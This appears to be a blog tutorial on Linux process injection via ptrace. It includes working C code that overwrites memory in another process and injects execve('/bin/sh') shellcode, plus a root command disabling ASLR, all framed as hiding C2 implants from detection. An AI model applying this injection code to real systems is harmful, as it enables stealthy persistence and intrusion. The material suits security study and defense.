Introduction
Cybercriminals, and the pentesters who emulate them, will generally try to obscure their presence on compromised systems so that detection and response mechanisms, users, and administrators have as hard a time as possible identifying them. Some of these techniques involve masquerading as a legitimate system process, or manipulating a legitimate process so that it ends up running the malicious code the agent wants to persist.
The techniques covered in this brief article have many legitimate uses. One is patching running services: if a critical service needs a fix but cannot be terminated for some reason, an alternative is to apply the fix while it is running. Another is debugging failing processes, where dynamic analysis can make it easier to find problems such as poor memory management or incorrect use of pointers.
However, once this level of interaction with a process is possible, a malicious agent can abuse it in various ways: altering the execution flow so that the process runs something that was not in its original instruction sequence, or reading data held in memory, such as credentials and keys.
This type of tactic is also commonly employed in what is known as in-memory injection: one process infects another by injecting instructions and creating a new malicious thread in it. Because it works by manipulating values in memory, it is often described as a fileless attack. The malicious code itself is not written to disk, which prevents static analysis of a file, and there is usually less need for other evasion techniques against anti-malware solutions, since not every EDR (Endpoint Detection and Response) solution performs dynamic analysis of process memory.
When deploying malware on a compromised server, such as an implant generated by a C2 framework (Metasploit, Cobalt Strike, Sliver, etc.), the malware has to be started on the machine somehow: by an ordinary executable file; by another file acting as a first stage, which abuses some functionality of other services or software to execute the malware (VBA, JScript, HTA, or C for shellcode execution); or by embedding it in a template file that carries the instructions somewhere in the binary (calc.exe, as in any example). These models have some problems:
- When the user closes the parent application, the implant will be terminated.
- It may be easier for security software or blue teams to detect processes with suspicious behavior, such as MS Word (or, in our case, LibreOffice, since this is Linux) making periodic requests to domain X, executing many different system calls, and creating threads for no apparent reason.
To solve these problems, it can be useful to migrate the implant to another process: one that is rarely terminated, or whose behavior is better aligned with how the implant operates and communicates. This gives the attacker's backdoor both good persistence on the server and a good disguise.
Imagine an implant (Beacon) whose callback to the C2 (command and control) server is made over HTTP. It could be injected into an NGINX service as a worker: if NGINX is acting as a reverse proxy, making outbound requests is its normal behavior, so this would be a good way to disguise the communication.
How it is done in a Windows environment
Linux-based operating systems offer no way to perform process injection the way Windows does. Windows has many APIs intended for debugging that, when abused, make injection very easy and safe, without corrupting the target process.
The main functions often abused by malware in a Windows environment are described below:
- OpenProcess opens (attaches to) an existing remote process for interaction.
- VirtualAllocEx is the extended version of the VirtualAlloc API; it can allocate n bytes in the attached process.
- WriteProcessMemory copies data to the remote process; the data (e.g., shellcode) is written into the previously allocated space.
- CreateRemoteThread creates a new thread in the remote process, which then executes the new code.
Anyone wanting to hide under a legitimate process will abuse these APIs to achieve the disguise. There are many other Windows API functions (including undocumented ones) for each action that can be used when trying to obfuscate the calls, as the functions mentioned here are easily flagged by antivirus solutions.
The order in which the functions are called is well defined: malware using this classic form of the technique follows the same chain of calls regardless of the programming language employed, which makes it comparatively easy to detect.
Note that on Windows there is a dedicated function for every need, such as allocating memory or creating a new thread. On Linux (and other UNIX-like systems) the main debugging interface is a single system call, ptrace, which is used to meet all the needs of debugging a process.
Other ways to inject instructions into Linux
The LD_PRELOAD environment variable allows dynamic libraries to be loaded at process startup. Functions exported by a preloaded library take priority over those of the original dependencies, which makes it possible to override a function with code that alters the original behavior of the program.
The technique has several limitations:
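- It can only override functions that the program resolves from shared libraries.
- It does not work for a statically linked binary, or for one that does not use the standard library.
- It is largely ignored for set-user-ID (SUID) binaries, which run in secure-execution mode.
- The library can only be loaded at process startup, so it cannot target a process that is already running.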
Another common approach is to use debugging software such as the GNU Debugger (GDB). Once attached to the target process, it can execute C-style code in that process. Inline assembly can be used to run instructions there, as in the following example, which executes /bin/bash in the target process, achieving something similar to process hollowing.
    register char *x asm("%rdi") = "/bin/bash";
    asm(
        "xor %rsi,%rsi;"   // Clear content of reg rsi
        "xor %rdx,%rdx;"   // Clear content of reg rdx
        "mov $59,%rax;"    // Move 59 (execve) to rax
        "syscall;");       // Pass execution to the kernel
The problem is that it would be necessary to have GDB operating on the compromised machine. Installing it may become an opsec problem.
So, let's use ptrace.
Syscall ptrace
The ptrace system call gives the calling process the ability to observe and control the execution of another process. The process that does the monitoring is called the tracer; the process being monitored is called the tracee.
long ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data);
NR | Syscall | RAX | RDI | RSI | RDX | R10 |
---|---|---|---|---|---|---|
101 | ptrace | 0x65 | Long Request | Long Pid | Unsigned Long addr | Unsigned Long Data |
The tracer has a broad capacity for manipulation over the tracee process, enabling the reading and editing of registers, changing data at memory addresses allocated by the tracee and, consequently, manipulating the execution flow of the tracee process. ptrace
is implemented in the kernel so it has full access to the task_struct
process structure.
The ptrace function takes a request as its first argument, which determines the type of interaction with the tracee process. The first request used is PTRACE_ATTACH, which attaches the tracer to the tracee. It attaches to a single thread, so for a multi-threaded process each thread has to be attached individually.
Implementations
Many common Linux programs and utilities use ptrace to give system administrators more control over process execution and to help with troubleshooting. One example is strace, which monitors system calls.
We can watch strace at work by tracing a process we control, in this case Python. I started a REPL (Read-Eval-Print Loop) and ran strace against the process ID of the Python interpreter, filtering on the openat call. Without the filter the output would be extremely noisy, and it would be almost impossible to find what we want.
    ╰─$ python3
    Python 3.8.10 (default, Mar 13 2023, 10:26:41)
    [GCC 9.4.0] on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import os
    >>> open("./history.txt","rb")
    <_io.BufferedReader name='./history.txt'>
Right after the file was opened, strace (which relies on ptrace) printed a new line showing the system call and the arguments used.
    ╰─$ strace -e openat -p 3330
    strace: Process 3330 attached
    openat(AT_FDCWD, "./history.txt", O_RDONLY|O_CLOEXEC) = 3
The call returned file descriptor 3, which was newly created and now refers to the opened file.
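As a rough illustration of how a tool like strace can build on ptrace, the following sketch traces a child process and counts its getppid system calls. The function name count_getppid_calls and the choice of getppid are made up for this example, and the register names (orig_rax, rax) assume x86-64. It is not how strace itself is implemented.

```c
#include <errno.h>
#include <signal.h>
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork a child that calls getppid() three times and count how many
 * getppid syscall entries the parent observes through ptrace.
 * Returns the count, or -1 on error. Hypothetical helper, x86-64 only. */
int count_getppid_calls(void) {
    pid_t child = fork();
    if (child == -1)
        return -1;
    if (child == 0) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);  /* become a tracee of the parent */
        raise(SIGSTOP);                         /* let the parent set up tracing */
        for (int i = 0; i < 3; i++)
            (void)getppid();
        _exit(0);
    }

    int status, count = 0;
    if (waitpid(child, &status, 0) == -1 || !WIFSTOPPED(status))
        return -1;
    /* Report syscall stops as SIGTRAP|0x80 so they differ from real signals. */
    if (ptrace(PTRACE_SETOPTIONS, child, NULL,
               (void *)(long)PTRACE_O_TRACESYSGOOD) == -1)
        return -1;

    long sig = 0;  /* signal to deliver on resume; 0 suppresses it */
    for (;;) {
        /* Resume until the next syscall entry or exit. */
        if (ptrace(PTRACE_SYSCALL, child, NULL, (void *)sig) == -1)
            return -1;
        if (waitpid(child, &status, 0) == -1)
            return -1;
        if (WIFEXITED(status) || WIFSIGNALED(status))
            break;
        sig = 0;
        if (WSTOPSIG(status) == (SIGTRAP | 0x80)) {
            struct user_regs_struct regs;
            if (ptrace(PTRACE_GETREGS, child, NULL, &regs) == -1)
                return -1;
            /* At syscall entry rax holds -ENOSYS and orig_rax the number. */
            if (regs.orig_rax == SYS_getppid && (long)regs.rax == -ENOSYS)
                count++;
        } else {
            sig = WSTOPSIG(status);  /* pass ordinary signals through */
        }
    }
    return count;
}
```

Calling count_getppid_calls() from a small main and printing the result is enough to try it. Tracing a child created with fork avoids the need for extra privileges.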
Changing a string in memory
This example changes a string in another process (the tracee). For this to be possible we need the process ID and the memory address at which the string is stored in the remote process.
The complete code of both programs can be found on GitHub.
The following code, which will be used as the target process, starts by allocating a small buffer on the heap and copying the string hello into it. It then prints the string together with the memory address at which it is stored. This address is important, because the bytes will be modified starting from it.
Disabling ASLR (address space layout randomization) may make the process simpler, since addresses then stay the same between runs. As root:
    echo 0 > /proc/sys/kernel/randomize_va_space
The program needs to pause so that the other program, which performs the injection, can run; afterwards it continues and shows whether the string was changed. The pause is implemented with a scanf call that waits for a number to be entered.
Content of the proc.c file.
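    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(void) {
        char *m = malloc(6);                  /* 5 characters plus the terminating NUL */
        strcpy(m, "hello");
        int n;
        printf("%s - %p\n", m, (void *)m);    /* the string and its heap address */
        scanf("%d", &n);                      /* pause until a number is entered */
        printf("%s - %p\n", m, (void *)m);    /* show the string again afterwards */
        free(m);
        return 0;
    }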
Running this code, the following data is directed to the output. The process is now waiting for input.
    ~$ ./proc
    hello - 0x55c1e3bfd2a0
Now we need the process ID.
30698 pts/1 S+ 0:00 ./proc
The other program performs the injection into the process. It declares a pid_t variable holding the process ID and a string holding the address where the target string is stored in the target process. Finally, it declares the message that will be written to the remote process and the length of that message.
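    pid_t pid = 30698;             /* process ID of the target */
    char *p = "0x55c1e3bfd2a0";    /* address printed by the target */
    char *m = "mundo\0";           /* message to write */
    int mlen = (int)strlen(m);     /* 5: strlen stops at the first NUL */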
A few messages help to follow the actions. The casts to void * match what the %p format specifier expects.
    printf("Remote data pointer: %p\n", (void *)address);
    printf("Local data pointer: %p\n", (void *)m);
The variable p holds the memory address as a string. To use it to locate the string that will be modified, it has to be converted to a number: strtoull() returns the unsigned long long value represented by the string, which can then be cast to a pointer when passing the destination address to ptrace().
unsigned long long address = strtoull(p, NULL, 16);
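The conversion above can be made a little more defensive. The helper below is a minimal sketch; parse_hex_address is a name invented for this example and is not part of the article's repository. It rejects input that is empty, has trailing characters, or overflows.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

/* Parse a hexadecimal address such as "0x55c1e3bfd2a0".
 * Returns 0 and stores the value in *out on success, -1 otherwise.
 * Hypothetical helper, shown for illustration only. */
int parse_hex_address(const char *text, uintptr_t *out) {
    char *end = NULL;

    errno = 0;
    unsigned long long value = strtoull(text, &end, 16);  /* accepts an optional 0x prefix */
    if (errno != 0 || end == text || *end != '\0')
        return -1;                 /* overflow, no digits, or trailing characters */
    if (value > UINTPTR_MAX)
        return -1;                 /* does not fit in a pointer on this platform */
    *out = (uintptr_t)value;
    return 0;
}
```

The result can be cast to void * when it is handed to ptrace as the remote address.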
After the declarations and conversions that will be used in the course of execution, it is possible to attach to the process using the ID.
ptrace(PTRACE_ATTACH, pid, NULL, NULL);
After attaching, the tracer has to wait until the tracee has actually stopped before interacting with it, typically with waitpid(). This is implemented in the final code.
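One common way to wait is waitpid(), which returns once the tracee has entered the stop caused by the attach. The sketch below is an assumption about how this step could look, not the code from the repository. The names attach_wait_detach and demo_attach are invented, and the demo traces a child of its own so that it can run without extra privileges.

```c
#include <signal.h>
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Attach to pid, wait for the resulting stop, then detach again.
 * Returns 0 on success and -1 on failure. Hypothetical helper. */
int attach_wait_detach(pid_t pid) {
    int status;

    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1)
        return -1;
    /* PTRACE_ATTACH sends SIGSTOP; block until the tracee has really stopped. */
    if (waitpid(pid, &status, 0) == -1 || !WIFSTOPPED(status))
        return -1;
    /* Registers and memory of the tracee can be accessed safely from here. */
    if (ptrace(PTRACE_DETACH, pid, NULL, NULL) == -1)
        return -1;
    return 0;
}

/* Demo: attach to a freshly forked, idle child and clean it up afterwards. */
int demo_attach(void) {
    pid_t child = fork();
    if (child == -1)
        return -1;
    if (child == 0) {
        for (;;)
            pause();               /* child: idle until it is killed */
    }
    int rc = attach_wait_detach(child);
    kill(child, SIGKILL);
    waitpid(child, NULL, 0);       /* reap the child */
    return rc;
}
```

Attaching to an unrelated process may additionally be restricted by system policy, which is why the demo sticks to its own child.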
The following loop takes the message byte by byte from local memory and copies it to the remote process, starting at the address collected earlier. Both addresses are incremented in step.
The copy is done with the PTRACE_POKEDATA request. The third argument is the memory address to be altered in the target process, and the fourth argument is the data to write.
The data argument is declared as void *, but PTRACE_POKEDATA treats it as a word-sized value rather than as a pointer. Each call therefore writes a whole word (8 bytes on x86-64) at the given address, not a single byte: the character ends up in the lowest byte and the remaining bytes are zero. Those zero bytes are overwritten by the following iterations, except after the last character, where they terminate the string and also clobber the few bytes that follow it.
    for (int i = 0; i < mlen; i++, address++, m++) {
        printf("Write %p <- %p: %c\n", (void *)address, (void *)m, *m);
        /* POKEDATA stores a whole word: the byte *m followed by zero bytes */
        ptrace(PTRACE_POKEDATA, pid, (void *)address, (void *)(long)*m);
    }
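Because PTRACE_POKEDATA always transfers a whole word, a more careful variant reads the current word with PTRACE_PEEKDATA, replaces only the bytes it wants to change, and writes the word back. The following is a sketch under that assumption. overlay_bytes and poke_bytes are invented names, and the tracee is assumed to be attached and stopped already.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>

/* Replace the first n bytes of a word with bytes from src and keep the rest. */
long overlay_bytes(long word, const char *src, size_t n) {
    if (n > sizeof(long))
        n = sizeof(long);
    memcpy(&word, src, n);
    return word;
}

/* Write len bytes into a stopped tracee without touching neighbouring memory.
 * Returns 0 on success, -1 on the first ptrace error. Hypothetical helper. */
int poke_bytes(pid_t pid, uintptr_t addr, const char *src, size_t len) {
    while (len > 0) {
        size_t n = len < sizeof(long) ? len : sizeof(long);
        long word = 0;

        if (n < sizeof(long)) {
            /* Partial word: fetch the current contents first. */
            errno = 0;
            word = ptrace(PTRACE_PEEKDATA, pid, (void *)addr, NULL);
            if (word == -1 && errno != 0)
                return -1;         /* -1 is also a valid word, so check errno */
        }
        word = overlay_bytes(word, src, n);
        if (ptrace(PTRACE_POKEDATA, pid, (void *)addr, (void *)word) == -1)
            return -1;
        addr += n;
        src += n;
        len -= n;
    }
    return 0;
}
```

With this approach the five bytes of the message would be written with a single peek and a single poke, and the three bytes that follow them in the word would keep their previous values.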
After the process is complete, it is already possible to detach from the target process.
ptrace(PTRACE_DETACH, pid, NULL, NULL);
The following output details the data being transferred.
    Remote data pointer: 0x55c1e3bfd2a0
    Local data pointer: 0x555555556017
    Write 0x55c1e3bfd2a0 <- 0x555555556017: m
    Write 0x55c1e3bfd2a1 <- 0x555555556018: u
    Write 0x55c1e3bfd2a2 <- 0x555555556019: n
    Write 0x55c1e3bfd2a3 <- 0x55555555601a: d
    Write 0x55c1e3bfd2a4 <- 0x55555555601b: o
After the target process is resumed by entering a number, the output shows that the string was completely replaced by the word “mundo”.
    1
    mundo - 0x55c1e3bfd2a0
Executing code within a remote process
This next example outlines a way to change the execution flow of the target process, and then execute arbitrary instructions, such as from shellcode.
The first step in executing a given sequence of instructions is to have those instructions available in the process's memory. Linux has no function like VirtualAllocEx; the closest alternative is to use ptrace as in the previous example, copying data from one address to another.
Linux also has no function like CreateRemoteThread to create a new execution flow in the remote process. ptrace can stand in for it: one of its requests gives access to the registers, including the instruction pointer, which holds the memory address of the next instruction (in machine code) to be executed. With the PTRACE_POKETEXT request, the instructions are therefore injected in sequence at the addresses the instruction pointer is about to pass through. The injected instructions can call fork to create a new subprocess, or use some other tactic to create a new thread. After the data has been written, the process is resumed, the instruction pointer advances through the written bytes, and they are executed by the CPU.
The first step is to attach to the process.
ptrace(PTRACE_ATTACH, pid, NULL, NULL);
The current state of the registers has to be recorded first. The shellcode changes register values and normally does not put the original values back, so to avoid corrupting the process the registers must be saved before the injection and restored afterwards.
    struct user_regs_struct regs;
    ptrace(PTRACE_GETREGS, pid, NULL, &regs);
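The save-and-restore idea can be tried in isolation on a harmless child process. The sketch below assumes x86-64 (it compares the rip and rsp fields), and the names save_and_restore_regs and demo_save_restore are invented for the example. It writes the saved registers back unchanged and checks that the instruction and stack pointers survived the round trip.

```c
#include <signal.h>
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/* Snapshot the registers of a stopped tracee, write them back unchanged,
 * and confirm that rip and rsp are the same afterwards.
 * Returns 0 on success, -1 otherwise. Hypothetical helper, x86-64 only. */
int save_and_restore_regs(pid_t pid) {
    struct user_regs_struct saved, check;

    if (ptrace(PTRACE_GETREGS, pid, NULL, &saved) == -1)
        return -1;
    /* A tracer would modify memory or registers of the tracee here. */
    if (ptrace(PTRACE_SETREGS, pid, NULL, &saved) == -1)
        return -1;
    if (ptrace(PTRACE_GETREGS, pid, NULL, &check) == -1)
        return -1;
    return (saved.rip == check.rip && saved.rsp == check.rsp) ? 0 : -1;
}

/* Demo: the child asks to be traced and stops itself; the parent inspects it. */
int demo_save_restore(void) {
    pid_t child = fork();
    if (child == -1)
        return -1;
    if (child == 0) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        raise(SIGSTOP);            /* stop so the parent can read registers */
        _exit(0);
    }
    int status;
    int rc = -1;
    if (waitpid(child, &status, 0) != -1 && WIFSTOPPED(status))
        rc = save_and_restore_regs(child);
    kill(child, SIGKILL);
    waitpid(child, NULL, 0);       /* reap the child */
    return rc;
}
```

Keeping the snapshot in a separate variable, rather than editing it in place, makes it harder to restore a modified copy by accident.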
The source and destination addresses are pointers to unsigned 4-byte integers, so 4 bytes of instructions are passed at a time.
A loop writes the bytes of the instructions, starting at the address held in the instruction pointer.
The index i is incremented by 4 on each iteration because it counts the bytes of shellcode copied so far, and each iteration handles 4 of them before moving on to the next block. Comparing i against the shellcode length stops the loop once the shellcode has been copied, so that it does not keep copying data beyond the end.
In the repository code some prints were added to show the process.
    uint32_t *s = (uint32_t *) shellcode;
    uint32_t *d = (uint32_t *) regs.rip;
    for (int i=0; i < shellcodeLen; i+=4, s++,d++) {
        ptrace(PTRACE_POKETEXT, target, d, *s);
    }
Finally, the registers are restored.
    regs.rip += 2;
    ptrace(PTRACE_SETREGS, target, NULL, &regs);
And the tracer detaches from the tracee.
ptrace(PTRACE_DETACH, target, NULL, NULL);
To test this code I ran proc.c from the previous example. Its process ID turned out to be 19156.
    ./a.out
    hello - 0x564a603702a0
As shellcode, I use a sequence of instructions, just 24 bytes long, that executes /bin/sh.
    0000000000000080 <_start>:
      000080: 50                      push   %rax
      000081: 48 31 d2                xor    %rdx,%rdx
      000084: 48 31 f6                xor    %rsi,%rsi
      000087: 48 bb 2f 62 69 6e 2f    movabs $0x68732f2f6e69622f,%rbx
      00008e: 2f 73 68
      000091: 53                      push   %rbx
      000092: 54                      push   %rsp
      000093: 5f                      pop    %rdi
      000094: b0 3b                   mov    $0x3b,%al
      000096: 0f 05                   syscall

    push rax              ; Insert rax into the stack
    xor rdx, rdx          ; Zeroes the content of rdx
    xor rsi, rsi          ; Zeroes the content of rsi
    mov rbx,'/bin//sh'    ; Moves the byte sequence to rbx
    push rbx              ; Inserts rbx into the stack
    push rsp              ; Inserts rsp into the stack (sp = stack pointer), pointing to rbx.
    pop rdi               ; Loads the top of the stack (rsp) into rdi, which will be "/bin/sh".
    mov al, 59            ; moves syscall execve into al.
    syscall               ; passes execution to the OS which should use the syscall in al.
The execve system call (number 59) takes three arguments: rdi holds the path of the program the kernel will execute, rsi a pointer to the argument vector, and rdx a pointer to the environment variable vector.
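The three arguments map directly onto the C prototype of execve. The sketch below is only an illustration, and the helper name run_with_execve is made up. Unlike the shellcode, which passes null pointers for the argument and environment vectors, it supplies both, and it runs the command in a child process so that the caller survives.

```c
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run `/bin/sh -c command` in a child through execve and return its exit
 * status, or -1 if the child could not be created or did not exit normally.
 * Hypothetical helper, shown for illustration only. */
int run_with_execve(const char *command) {
    pid_t child = fork();
    if (child == -1)
        return -1;
    if (child == 0) {
        char *const argv[] = { "sh", "-c", (char *)command, NULL };  /* rsi */
        char *const envp[] = { NULL };                               /* rdx */
        execve("/bin/sh", argv, envp);                               /* rdi */
        _exit(127);                /* only reached if execve failed */
    }
    int status;
    if (waitpid(child, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

For example, run_with_execve("exit 7") returns 7, the exit status of the shell.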
The output of the tracer is shown in the following block. There were 6 copy operations, each injecting 4 bytes into the tracee process.
    Start injecting shellcode at 0x7f6ea3edcfd2
    Writting from 0x55ddcee77056 - d2314850 to 0x7f6ea3edcfd2
    Writting from 0x55ddcee7705a - 48f63148 to 0x7f6ea3edcfd6
    Writting from 0x55ddcee7705e - 69622fbb to 0x7f6ea3edcfda
    Writting from 0x55ddcee77062 - 732f2f6e to 0x7f6ea3edcfde
    Writting from 0x55ddcee77066 - 5f545368 to 0x7f6ea3edcfe2
    Writting from 0x55ddcee7706a - 50f3bb0 to 0x7f6ea3edcfe6
    24 Bytes written
    Continue from 0x7f6ea3edcfd4
    Deataching from PID: 19156
The process was resumed and a shell started in the target.
    ╰─$ ./a.out
    hello - 0x564a603702a0
    $ ls
    README.md  a.out  main.c  main1.c  proc.c
    $ cat /etc/os-release
    NAME="Ubuntu"
    VERSION="20.04.6 LTS (Focal Fossa)"
    ID=ubuntu
    ID_LIKE=debian
    ...
When the registers are restored, the instruction pointer returns to its original location, where the shellcode now sits. Execution resumes, and the instruction pointer moves through the shellcode and executes it.
Conclusions
UNIX-based systems do not offer the same range of support for process manipulation as a Windows environment, but it is still possible to rely on ptrace to meet these needs. The instruction injection techniques have to be considerably more elaborate and, because code that works on one architecture may not work on another, they are somewhat unstable. That is why we do not see major post-exploitation tools supporting process migration on Linux: in many cases it may not work and, worse, it may corrupt the target process, creating a more critical problem.
This article serves as an introduction to the technique. As mentioned, I believe that process injection in Linux is underdeveloped, so I would like to build something more solid to eventually add to the post-exploitation tools the ability to migrate and spawn in a remote process, as is well developed by C2 tools when operating in Windows. Possibly, the next article will be about injecting object files or shared libraries, but for that to be possible, the foundation has to be very well understood.